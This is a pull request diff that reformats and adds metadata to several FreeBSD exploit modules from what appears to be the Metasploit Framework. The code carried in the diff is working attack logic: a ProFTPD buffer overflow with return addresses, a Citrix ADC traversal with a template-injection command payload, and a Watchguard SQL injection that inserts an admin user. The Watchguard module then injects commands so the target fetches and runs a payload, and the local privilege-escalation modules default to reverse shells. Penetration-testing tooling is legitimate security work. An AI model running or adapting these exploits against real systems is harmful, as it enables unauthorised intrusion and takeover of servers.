### PR TITLE
modules/exploits/freebsd: Add Notes and resolve RuboCop violations

### DIFF
--- a/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
+++ b/modules/exploits/freebsd/ftp/proftp_telnet_iac.rb
@@ -10,86 +10,93 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)',
+        'Description' => %q{
           This module exploits a stack-based buffer overflow in versions of ProFTPD
-        server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
-        large number of Telnet IAC commands, an attacker can corrupt memory and
-        execute arbitrary code.
-      },
-      'Author'         => [ 'jduck' ],
-      'References'     =>
-        [
+          server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
+          large number of Telnet IAC commands, an attacker can corrupt memory and
+          execute arbitrary code.
+        },
+        'Author' => [ 'jduck' ],
+        'References' => [
           ['CVE', '2010-4221'],
           ['OSVDB', '68985'],
           ['BID', '44562']
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
           'PrependChrootBreak' => true
         },
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 1024,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 1024,
           # NOTE: \xff's need to be doubled (per ftp/telnet stuff)
           'BadChars' => "\x00\x0a\x0d",
-          'PrependEncoder' => "\x83\xec\x7f", # sub esp,0x7f (fix esp)
+          'PrependEncoder' => "\x83\xec\x7f" # sub esp,0x7f (fix esp)
         },
-      'Platform'       => [ 'bsd' ],
-      'Targets'        =>
-      [
-        #
-        # Automatic targeting via fingerprinting
-        #
-        [ 'Automatic Targeting', { 'auto' => true }  ],
+        'Platform' => [ 'bsd' ],
+        'Arch' => [ ARCH_X86 ],
+        'Targets' => [
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true } ],
 
-        #
-        # This special one comes first since we dont want its index changing.
-        #
-        [	'Debug',
-          {
-            'IACCount' => 8192, # should cause crash writing off end of stack
-            'Offset' => 0,
-            'Ret' => 0x41414242,
-            'Writable' => 0x43434545
-          }
+          #
+          # This special one comes first since we dont want its index changing.
+          #
+          [
+            'Debug',
+            {
+              'IACCount' => 8192, # should cause crash writing off end of stack
+              'Offset' => 0,
+              'Ret' => 0x41414242,
+              'Writable' => 0x43434545
+            }
+          ],
+
+          #
+          # specific targets
+          #
+          [
+            'ProFTPD 1.3.2a Server (FreeBSD 8.0)',
+            {
+              'IACCount' => 1024,
+              'Offset' => 0x414,
+              # 'Ret' => 0xbfbfeac4,
+              'Writable' => 0x80e64a4,
+              'Bruteforce' =>
+                {
+                  'Start' => { 'Ret' => 0xbfbffdfc },
+                  'Stop' => { 'Ret' => 0xbfa00000 },
+                  'Step' => 512
+                }
+            }
+          ],
         ],
-
-        #
-        # specific targets
-        #
-        [ 'ProFTPD 1.3.2a Server (FreeBSD 8.0)',
-          {
-            'IACCount' => 1024,
-            'Offset' => 0x414,
-            #'Ret' => 0xbfbfeac4,
-            'Writable' => 0x80e64a4,
-            'Bruteforce'   =>
-              {
-                'Start' => { 'Ret' => 0xbfbffdfc },
-                'Stop'  => { 'Ret' => 0xbfa00000 },
-                'Step'  => 512
-              }
-          }
-        ],
-
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2010-11-01'))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2010-11-01',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+          'SideEffects' => [ IOC_IN_LOGS, ]
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(21),
-      ])
+      ]
+    )
   end
-
 
   def check
     # NOTE: We don't care if the login failed here...
-    ret = connect
+    connect
     banner = sock.get_once || ''
 
     # We just want the banner to check against our targets..
@@ -99,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if banner =~ /ProFTPD (1\.3\.[23])/i
       banner_array = banner.split('.')
 
-      if banner_array.count() > 0 && !banner_array[3].nil?
+      if banner_array.count > 0 && !banner_array[3].nil?
         # gets 1 char on the third part of version number.
         relnum = banner_array[2][0..0]
         tmp = banner_array[2].split(' ')
@@ -107,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
         # example: 1.2.3rc ('rc' string)
         extra = tmp[0][1..(tmp[0].length - 1)]
         if relnum == '2'
-          if extra.length > 0
+          if !extra.empty?
             if extra[0..1] == 'rc'
               v = extra[2..extra.length].to_i
               if v && v > 2
@@ -131,6 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def target
     return @mytarget if @mytarget
+
     super
   end
 
@@ -140,33 +148,33 @@ class MetasploitModule < Msf::Exploit::Remote
     # Use a copy of the target
     @mytarget = target
 
-    if (target['auto'])
+    if target['auto']
       @mytarget = nil
 
-      print_status("Automatically detecting the target...")
-      if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then
+      print_status('Automatically detecting the target...')
+      if banner && (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))
         print_status("FTP Banner: #{banner.strip}")
         version = m[1]
       else
-        fail_with(Failure::NoTarget, "No matching target")
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       regexp = Regexp.escape(version)
-      self.targets.each do |t|
-        if (t.name =~ /#{regexp}/) then
+      targets.each do |t|
+        if (t.name =~ /#{regexp}/)
           @mytarget = t
           break
         end
       end
 
-      if (not @mytarget)
-        fail_with(Failure::NoTarget, "No matching target")
+      if !@mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       print_status("Selected Target: #{@mytarget.name}")
 
       pl = exploit_regenerate_payload(@mytarget.platform, arch)
-      if not pl
+      if !pl
         fail_with(Failure::Unknown, 'Unable to regenerate payload!')
       end
     else
@@ -175,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_status("FTP Banner: #{banner.strip}")
       end
 
-      pl = payload
+      payload
     end
     disconnect
 
@@ -186,9 +194,9 @@ class MetasploitModule < Msf::Exploit::Remote
     @mytarget ||= target
 
     ret = addrs['Ret']
-    print_status("Trying return address 0x%.8x..." % ret)
+    print_status('Trying return address 0x%.8x...' % ret)
 
-    #puts "attach and press any key"; bleh = $stdin.gets
+    # puts "attach and press any key"; bleh = $stdin.gets
 
     buf = ''
     buf << 'SITE '

--- a/modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb
@@ -16,63 +16,72 @@ class MetasploitModule < Msf::Exploit::Remote
   moved_from 'exploit/linux/http/citrix_dir_traversal_rce'
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'                => 'Citrix ADC (NetScaler) Directory Traversal RCE',
-      'Description'         => %q{
-        This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka
-        NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.
-      },
-      'Author'              => [
-        'Mikhail Klyuchnikov',          # Discovery
-        'Project Zero India',           # PoC used by this module
-        'TrustedSec',                   # PoC used by this module
-        'James Brytan',                 # PoC contributed independently
-        'James Smith',                  # PoC contributed independently
-        'Marisa Mack',                  # PoC contributed independently
-        'Rob Vinson',                   # PoC contributed independently
-        'Sergey Pashevkin',             # PoC contributed independently
-        'Steven Laura',                 # PoC contributed independently
-        'mekhalleh (RAMELLA Sébastien)' # Module author (https://www.pirates.re/)
-      ],
-      'References'          => [
-        ['CVE', '2019-19781'],
-        ['EDB', '47901'],
-        ['EDB', '47902'],
-        ['URL', 'http://web.archive.org/web/20220608001448/https://support.citrix.com/article/CTX267027'],
-        ['URL', 'http://web.archive.org/web/20200707202522/https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],
-        ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']
-      ],
-      'DisclosureDate'      => '2019-12-17',
-      'License'             => MSF_LICENSE,
-      'Platform'            => ['python', 'unix'],
-      'Arch'                => [ARCH_PYTHON, ARCH_CMD],
-      'Privileged'          => false,
-      'Targets'             => [
-        ['Python',
-          'Platform'        => 'python',
-          'Arch'            => ARCH_PYTHON,
-          'Type'            => :python,
-          'DefaultOptions'  => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'}
+    super(
+      update_info(
+        info,
+        'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',
+        'Description' => %q{
+          This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka
+          NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.
+        },
+        'Author' => [
+          'Mikhail Klyuchnikov',          # Discovery
+          'Project Zero India',           # PoC used by this module
+          'TrustedSec',                   # PoC used by this module
+          'James Brytan',                 # PoC contributed independently
+          'James Smith',                  # PoC contributed independently
+          'Marisa Mack',                  # PoC contributed independently
+          'Rob Vinson',                   # PoC contributed independently
+          'Sergey Pashevkin',             # PoC contributed independently
+          'Steven Laura',                 # PoC contributed independently
+          'mekhalleh (RAMELLA Sébastien)' # Module author (https://www.pirates.re/)
         ],
-        ['Unix Command',
-          'Platform'        => 'unix',
-          'Arch'            => ARCH_CMD,
-          'Type'            => :unix_cmd,
-          'DefaultOptions'  => {'PAYLOAD' => 'cmd/unix/reverse_perl'}
-        ]
-      ],
-      'DefaultTarget'       => 0,
-      'DefaultOptions'      => {
-        'CheckModule'       => 'auxiliary/scanner/http/citrix_dir_traversal',
-        'HttpClientTimeout' => 3.5
-      },
-      'Notes'               => {
-        'AKA'               => ['Shitrix'],
-        'Stability'         => [CRASH_SAFE],
-        'Reliability'       => [REPEATABLE_SESSION],
-        'SideEffects'       => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
-      }
-    ))
+        'References' => [
+          ['CVE', '2019-19781'],
+          ['EDB', '47901'],
+          ['EDB', '47902'],
+          ['URL', 'http://web.archive.org/web/20220608001448/https://support.citrix.com/article/CTX267027'],
+          ['URL', 'http://web.archive.org/web/20200707202522/https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],
+          ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']
+        ],
+        'DisclosureDate' => '2019-12-17',
+        'License' => MSF_LICENSE,
+        'Platform' => ['python', 'unix'],
+        'Arch' => [ARCH_PYTHON, ARCH_CMD],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Python',
+            {
+              'Platform' => 'python',
+              'Arch' => ARCH_PYTHON,
+              'Type' => :python,
+              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',
+          'HttpClientTimeout' => 3.5
+        },
+        'Notes' => {
+          'AKA' => ['Shitrix'],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
 
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/'])
@@ -99,18 +108,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     filename = rand_text_alpha(8..42)
-    nonce    = rand_text_alpha(8..42)
+    nonce = rand_text_alpha(8..42)
 
     res = send_request_cgi(
-      'method'      => 'POST',
-      'uri'         => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),
-      'headers'     => {
-        'NSC_USER'  => "../../../netscaler/portal/templates/#{filename}",
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),
+      'headers' => {
+        'NSC_USER' => "../../../netscaler/portal/templates/#{filename}",
         'NSC_NONCE' => nonce
       },
-      'vars_post'   => {
-        'url'       => rand_text_alpha(8..42),
-        'title'     => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"
+      'vars_post' => {
+        'url' => rand_text_alpha(8..42),
+        'title' => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"
       }
     )
 
@@ -120,13 +129,13 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     res = send_request_cgi(
-      'method'      => 'GET',
-      'uri'         => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),
-      'headers'     => {
-        'NSC_USER'  => rand_text_alpha(8..42),
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),
+      'headers' => {
+        'NSC_USER' => rand_text_alpha(8..42),
         'NSC_NONCE' => nonce
       },
-      'partial'     => true
+      'partial' => true
     )
 
     unless res && res.code == 200

--- a/modules/exploits/freebsd/http/watchguard_cmd_exec.rb
+++ b/modules/exploits/freebsd/http/watchguard_cmd_exec.rb
@@ -12,40 +12,44 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Watchguard XCS Remote Command Execution',
-      'Description'    => %q{
-        This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
-        appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
-        remote attacker may insert a valid web user into the appliance database, and get access
-        to the web interface. On the other hand, a vulnerability in the web interface allows the
-        attacker to inject operating system commands as the 'nobody' user.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Watchguard XCS Remote Command Execution',
+        'Description' => %q{
+          This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
+          appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
+          remote attacker may insert a valid web user into the appliance database, and get access
+          to the web interface. On the other hand, a vulnerability in the web interface allows the
+          attacker to inject operating system commands as the 'nobody' user.
+        },
+        'Author' => [
           'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2015-5453'],
           ['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
         ],
-      'Platform'       => 'bsd',
-      'Arch'           => ARCH_X64,
-      'Privileged'     => false,
-      'Stance'         => Msf::Exploit::Stance::Aggressive,
-      'Targets'        =>
-        [
-          [ 'Watchguard XCS 9.2/10.0', { }]
+        'Platform' => 'bsd',
+        'Arch' => ARCH_X64,
+        'Privileged' => false,
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'Targets' => [
+          [ 'Watchguard XCS 9.2/10.0', {}]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'SSL' => true
         },
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2015-06-29'
-    ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2015-06-29',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES, ]
+        }
+      )
+    )
 
     register_options(
       [
@@ -60,19 +64,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    #Check to see if the SQLi is present
+    # Check to see if the SQLi is present
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
       'cookie' => "sid=1'"
-     })
+    })
 
-     if res && res.body && res.body.include?('unterminated quoted string')
-       return Exploit::CheckCode::Vulnerable
-     end
+    if res && res.body && res.body.include?('unterminated quoted string')
+      return Exploit::CheckCode::Vulnerable
+    end
 
-     Exploit::CheckCode::Safe
+    Exploit::CheckCode::Safe
   end
-
 
   def exploit
     # Get a valid session by logging in or exploiting SQLi to add user
@@ -96,13 +99,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # Start the server and use primer to trigger fetching and running of the payload
     begin
       Timeout.timeout(datastore['HTTPDELAY']) { super }
-    rescue Timeout::Error
+    rescue Timeout::Error => e
+      fail_with(Failure::TimeoutExpired, e.message)
     end
   end
 
   def attempt_login(username, pwd_clear)
-    #Attempts to login with the provided user credentials
-    #Get the login page
+    # Attempts to login with the provided user credentials
+    # Get the login page
     get_login_hash = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/login.spl')
     })
@@ -111,11 +115,12 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, 'Could not get login page.')
     end
 
-    #Find the hash token needed to login
+    # Find the hash token needed to login
     login_hash = ''
     get_login_hash.body.each_line do |line|
       next if line !~ /name="hash" value="(.*)"/
-      login_hash = $1
+
+      login_hash = ::Regexp.last_match(1)
       break
     end
 
@@ -125,8 +130,8 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     login_post = {
-      'u' => "#{username}",
-      'pwd' => "#{pwd_clear}",
+      'u' => username.to_s,
+      'pwd' => pwd_clear.to_s,
       'hash' => login_hash,
       'login' => 'Login'
     }
@@ -142,7 +147,6 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-
     unless login && login.body && login.body.include?('<title>Loading...</title>')
       return nil
     end
@@ -151,14 +155,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def add_user(user_id, username, pwd_hash, pwd_clear)
-    #Adds a user to the database using the unauthed SQLi
+    # Adds a user to the database using the unauthed SQLi
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
       'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
     })
 
     unless res && res.body
-      fail_with(Failure::Unreachable, "Could not connect to host")
+      fail_with(Failure::Unreachable, 'Could not connect to host')
     end
 
     if res.body.include?('ERROR:  duplicate key value violates unique constraint')
@@ -171,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def generate_device_hash(cleartext_password)
-    #Generates the specific hashes needed for the XCS
+    # Generates the specific hashes needed for the XCS
     pre_salt = 'BorderWare '
     post_salt = ' some other random (9) stuff'
     hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)
@@ -180,14 +184,14 @@ class MetasploitModule < Msf::Exploit::Remote
     final_hash
   end
 
-  def send_cmd_exec(uri, os_cmd, blocking = true)
-    #This is a handler function that makes HTTP calls to exploit the command injection issue
+  def send_cmd_exec(uri, os_cmd, blocking: true)
+    # This is a handler function that makes HTTP calls to exploit the command injection issue
     unless @sid
       fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
     end
 
     opts = {
-      'uri' => normalize_uri(target_uri.path, "#{uri}"),
+      'uri' => normalize_uri(target_uri.path, uri.to_s),
       'cookie' => "sid=#{@sid}",
       'encode_params' => true,
       'vars_get' => {
@@ -202,7 +206,7 @@ class MetasploitModule < Msf::Exploit::Remote
       res = send_request_cgi(opts, 1)
     end
 
-    #Handle cmd exec failures
+    # Handle cmd exec failures
     if res.nil? && blocking
       fail_with(Failure::Unknown, 'Failed to exploit command injection.')
     end
@@ -211,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_session
-    #Gets a valid login session, either valid creds or the SQLi vulnerability
+    # Gets a valid login session, either valid creds or the SQLi vulnerability
     username = datastore['WATCHGUARD_USER']
     pwd_clear = datastore['WATCHGUARD_PASSWORD']
     user_id = rand(999)
@@ -240,7 +244,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def primer
     vprint_status('Primer hook called, make the server get and run exploit')
 
-    #Gets the autogenerated uri from the mixin
+    # Gets the autogenerated uri from the mixin
     payload_uri = get_uri
 
     filename = rand_text_alpha_lower(8)
@@ -253,7 +257,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     chmod_cmd = "chmod +x /tmp/#{filename}"
     vprint_status('Chmoding the payload...')
-    send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd)
+    send_cmd_exec('/ADMIN/mailqueue.spl', chmod_cmd)
 
     exec_cmd = "/tmp/#{filename}"
     vprint_status('Running the payload...')
@@ -263,7 +267,7 @@ class MetasploitModule < Msf::Exploit::Remote
     raise(Timeout::Error)
   end
 
-  #Handle incoming requests from the server
+  # Handle incoming requests from the server
   def on_request_uri(cli, request)
     vprint_status("on_request_uri called: #{request.inspect}")
     print_status('Sending the payload to the server...')

--- a/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
+++ b/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
@@ -36,36 +36,38 @@ class MetasploitModule < Msf::Exploit::Local
           FreeBSD 9.0-RELEASE (amd64).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Rafal Wojtczuk', # Discovery
-            'John Baldwin', # Discovery
-            'iZsh', # Exploit
-            'bcoles' # Metasploit
-          ],
+        'Author' => [
+          'Rafal Wojtczuk', # Discovery
+          'John Baldwin', # Discovery
+          'iZsh', # Exploit
+          'bcoles' # Metasploit
+        ],
         'DisclosureDate' => '2012-06-12',
         'Platform' => ['bsd'], # FreeBSD
         'Arch' => [ARCH_X64],
         'SessionTypes' => ['shell'],
-        'References' =>
-          [
-            ['BID', '53856'],
-            ['CVE', '2012-0217'],
-            ['EDB', '28718'],
-            ['PACKETSTORM', '113584'],
-            ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],
-            ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],
-            ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],
-            ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],
-            ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],
-            ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']
-          ],
-        'Targets' =>
-          [
-            ['Automatic', {}]
-          ],
+        'References' => [
+          ['BID', '53856'],
+          ['CVE', '2012-0217'],
+          ['EDB', '28718'],
+          ['PACKETSTORM', '113584'],
+          ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],
+          ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],
+          ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],
+          ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],
+          ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],
+          ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']
+        ],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
         'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_OS_RESTARTS, ],
+          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
       )
     )
     register_advanced_options([
@@ -111,18 +113,21 @@ class MetasploitModule < Msf::Exploit::Local
     unless kernel_release =~ /^(8\.3|9\.0)-RELEASE/
       return CheckCode::Safe("FreeBSD version #{kernel_release} is not vulnerable")
     end
+
     vprint_good("FreeBSD version #{kernel_release} appears vulnerable")
 
     kernel_arch = cmd_exec('uname -m').to_s
     unless kernel_arch.include?('64')
       return CheckCode::Safe("System architecture #{kernel_arch} is not supported")
     end
+
     vprint_good("System architecture #{kernel_arch} is supported")
 
     hw_model = cmd_exec('/sbin/sysctl hw.model').to_s
     unless hw_model.downcase.include?('intel')
       return CheckCode::Safe("#{hw_model} is not vulnerable")
     end
+
     vprint_good("#{hw_model} is vulnerable")
 
     CheckCode::Appears

--- a/modules/exploits/freebsd/local/mmap.rb
+++ b/modules/exploits/freebsd/local/mmap.rb
@@ -10,46 +10,49 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Exploit::FileDropper
 
-  def initialize(info={})
-    super( update_info( info, {
-        'Name'          => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
-        'Description'   => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
+        'Description' => %q{
           This module exploits a vulnerability that can be used to modify portions of
           a process's address space, which may lead to privilege escalation.  Systems
           such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
         },
-        'License'       => MSF_LICENSE,
-        'Author'        =>
-          [
-            'Konstantin Belousov',   # Discovery
-            'Alan Cox',              # Discovery
-            'Hunger',                # POC
-            'sinn3r'                 # Metasploit
-          ],
-        'Platform'      => [ 'bsd' ],
-        'Arch'          => [ ARCH_X86 ],
-        'SessionTypes'  => [ 'shell' ],
-        'References'    =>
-          [
-            [ 'CVE', '2013-2171' ],
-            [ 'OSVDB', '94414' ],
-            [ 'EDB', '26368' ],
-            [ 'BID', '60615' ],
-            [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
-          ],
-        'Targets'       =>
-          [
-            [ 'FreeBSD x86', {} ]
-          ],
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Konstantin Belousov',   # Discovery
+          'Alan Cox',              # Discovery
+          'Hunger',                # POC
+          'sinn3r'                 # Metasploit
+        ],
+        'Platform' => [ 'bsd' ],
+        'Arch' => [ ARCH_X86 ],
+        'SessionTypes' => [ 'shell' ],
+        'References' => [
+          [ 'CVE', '2013-2171' ],
+          [ 'OSVDB', '94414' ],
+          [ 'EDB', '26368' ],
+          [ 'BID', '60615' ],
+          [ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
+        ],
+        'Targets' => [
+          [ 'FreeBSD x86', {} ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2013-06-18',
-      }
-    ))
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
     register_options([
       # It isn't OptPath becuase it's a *remote* path
-      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
     ])
-
   end
 
   def check
@@ -61,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def upload_payload
     fname = datastore['WritableDir']
-    fname = "#{fname}/" unless fname =~ %r'/$'
+    fname = "#{fname}/" unless fname =~ %r{/$}
     if fname.length > 36
       fail_with(Failure::BadConfig, "WritableDir can't be longer than 33 characters")
     end
@@ -69,7 +72,8 @@ class MetasploitModule < Msf::Exploit::Local
 
     p = generate_payload_exe
     write_file(fname, p)
-    return nil if not file_exist?(fname)
+    return nil if !file_exist?(fname)
+
     cmd_exec("chmod +x #{fname}")
     fname
   end
@@ -78,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
     #
     # Metasm does not support FreeBSD executable generation.
     #
-    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2171.bin")
+    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2013-2171.bin')
     x = File.open(path, 'rb') { |f| f.read(f.stat.size) }
     x.gsub(/MSFABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/, payload_fname.ljust(40, "\x00"))
   end
@@ -87,18 +91,19 @@ class MetasploitModule < Msf::Exploit::Local
     fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
     bin = generate_exploit(payload_fname)
     write_file(fname, bin)
-    return nil if not file_exist?(fname)
+    return nil if !file_exist?(fname)
+
     cmd_exec("chmod +x #{fname}")
     fname
   end
 
   def exploit
     payload_fname = upload_payload
-    fail_with(Failure::NotFound, "Payload failed to upload") if payload_fname.nil?
+    fail_with(Failure::NotFound, 'Payload failed to upload') if payload_fname.nil?
     print_status("Payload #{payload_fname} uploaded.")
 
     exploit_fname = upload_exploit(payload_fname)
-    fail_with(Failure::NotFound, "Exploit failed to upload") if exploit_fname.nil?
+    fail_with(Failure::NotFound, 'Exploit failed to upload') if exploit_fname.nil?
     print_status("Exploit #{exploit_fname} uploaded.")
 
     register_files_for_cleanup(payload_fname, exploit_fname)

--- a/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb
+++ b/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb
@@ -33,47 +33,48 @@ class MetasploitModule < Msf::Exploit::Local
           FreeBSD 8.0-RELEASE (amd64).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Kingcope', # Independent discovery, public disclosure, and exploit
-            'stealth', # Discovery and exploit (4b1717926ed0d4823622011625fb1824)
-            'bcoles' # Metasploit (using Kingcope's exploit code [modified])
-          ],
+        'Author' => [
+          'Kingcope', # Independent discovery, public disclosure, and exploit
